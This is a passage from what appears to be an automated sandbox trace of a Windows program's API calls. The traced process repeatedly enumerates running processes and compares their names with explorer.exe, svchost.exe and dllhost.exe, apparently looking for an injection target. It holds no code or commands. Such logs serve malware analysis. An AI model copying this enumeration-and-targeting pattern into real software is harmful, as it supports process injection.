(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0185.598] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.598] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.598] CloseHandle (hObject=0xec) returned 1 [0185.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0185.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0185.599] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0185.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0185.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0185.599] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.599] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.599] CloseHandle (hObject=0xec) returned 1 [0185.599] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0185.599] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0185.599] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0185.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0185.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0185.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.600] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.600] CloseHandle (hObject=0xec) returned 1 [0185.600] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0185.600] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0185.600] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0185.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0185.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0185.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.600] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.600] CloseHandle (hObject=0xec) returned 1 [0185.600] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0185.601] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0185.601] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0185.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0185.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0185.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0185.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0185.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0185.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0185.603] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0185.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0185.604] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.604] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.604] CloseHandle (hObject=0xec) returned 1 [0185.604] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0185.605] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.605] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.605] CloseHandle (hObject=0xec) returned 1 [0185.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0185.605] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0185.606] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.606] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.606] CloseHandle (hObject=0xec) returned 1 [0185.606] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0185.606] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0185.607] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.607] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.607] CloseHandle (hObject=0xec) returned 1 [0185.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.607] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0185.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.608] CloseHandle (hObject=0xec) returned 1 [0185.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0185.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0185.608] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.608] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0185.608] CloseHandle (hObject=0xec) returned 1 [0185.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0185.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0185.608] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0185.608] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0185.609] CloseHandle (hObject=0xe8) returned 1 [0185.609] Sleep (dwMilliseconds=0x3e8) [0186.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0186.618] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0186.618] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0186.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0186.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0186.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0186.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0186.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0186.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0186.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0186.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0186.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0186.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0186.623] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0186.623] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0186.624] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0186.624] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0186.625] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0186.625] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0186.626] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0186.626] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0186.627] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.627] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.627] CloseHandle (hObject=0xec) returned 1 [0186.627] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0186.628] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0186.628] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.628] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.628] CloseHandle (hObject=0xec) returned 1 [0186.628] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0186.629] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0186.629] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0186.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0186.630] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.630] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.630] CloseHandle (hObject=0xec) returned 1 [0186.630] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0186.630] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0186.630] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0186.630] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0186.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0186.630] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.630] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.630] CloseHandle (hObject=0xec) returned 1 [0186.630] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0186.630] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0186.630] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0186.630] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0186.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0186.631] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.631] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.631] CloseHandle (hObject=0xec) returned 1 [0186.631] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0186.631] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0186.631] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0186.631] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0186.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0186.632] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.632] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.632] CloseHandle (hObject=0xec) returned 1 [0186.632] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0186.632] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0186.632] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0186.632] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0186.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0186.632] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.632] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.633] CloseHandle (hObject=0xec) returned 1 [0186.633] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0186.633] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0186.633] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0186.633] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0186.633] OpenProcess 